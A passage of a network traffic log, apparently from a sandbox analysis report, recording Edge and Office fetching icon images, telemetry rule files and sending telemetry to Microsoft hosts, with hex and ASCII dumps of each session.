https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 09:33:26 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49872	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:27 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: 85d0987b-001e-0045-3b1c-34b596000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093327Z-174f7845968j9dchhC1EWRfe7400000004gg000000007uxh Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.5	49874	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 77d57460-901e-0083-6dd5-33bb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968px8v7hC1EWR08ng00000004wg00000000agm2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.5	49875	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 554aabf5-b01e-00ab-71d5-33dafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968c2t8dhC1EWR8s2000000004fg000000004re7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	49873	20.50.73.10	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317605958&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5789 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1; msnup=
2024-11-11 09:33:27 UTC	5789	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 30 39 3a 33 33 3a 32 35 2e 39 35 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 36 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 30 62 66 63 61 64 37 2d 33 65 30 63 2d 34 34 37 33 2d 38 32 61 35 2d 31 36 32 32 37 34 39 62 39 39 37 31 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 39 32 38 33 34 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-11T09:33:25.957Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":6,"installId":"c0bfcad7-3e0c-4473-82a5-1622749b9971","epoch":"4292834591"},"app":{"loc
2024-11-11 09:33:27 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=c65590b310a14943a81f8ac86b9ceeed&HASH=c655&LV=202411&V=4&LU=1731317607809; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 09:33:27 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=347f0b5c18294c059857ab379a3a0b55; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 10:03:27 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1851 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 09:33:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	49880	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:27 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: 1432c6b2-f01e-0014-7d08-34ab63000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093327Z-174f7845968l4kp6hC1EWRe8840000000530000000000t9k Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	49876	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:28 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: 47e11513-001e-0023-751c-3407cc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093327Z-174f7845968swgbqhC1EWRmnb400000004x0000000004vsy Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	49879	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:28 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: 770171a2-801e-0032-0b1c-3430d7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093327Z-174f7845968vwdr7hC1EWRsh3w00000004k000000000autm Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	49877	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:28 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: 4e22f1bc-a01e-0061-451c-342cd8000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093327Z-174f7845968glpgnhC1EWR7uec00000004x0000000004f28 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	49878	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:27 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: 2ea87f43-601e-0077-1e05-34ed46000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093327Z-174f7845968nnm4mhC1EWR1rn400000004m0000000009gdm Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.5	49881	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: d9045dfb-101e-00a2-06d5-339f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968cdxdrhC1EWRg0en00000004t0000000001dgm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.5	49883	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 01111fca-d01e-002b-41d5-3325fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968vwdr7hC1EWRsh3w00000004ng000000006qsk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
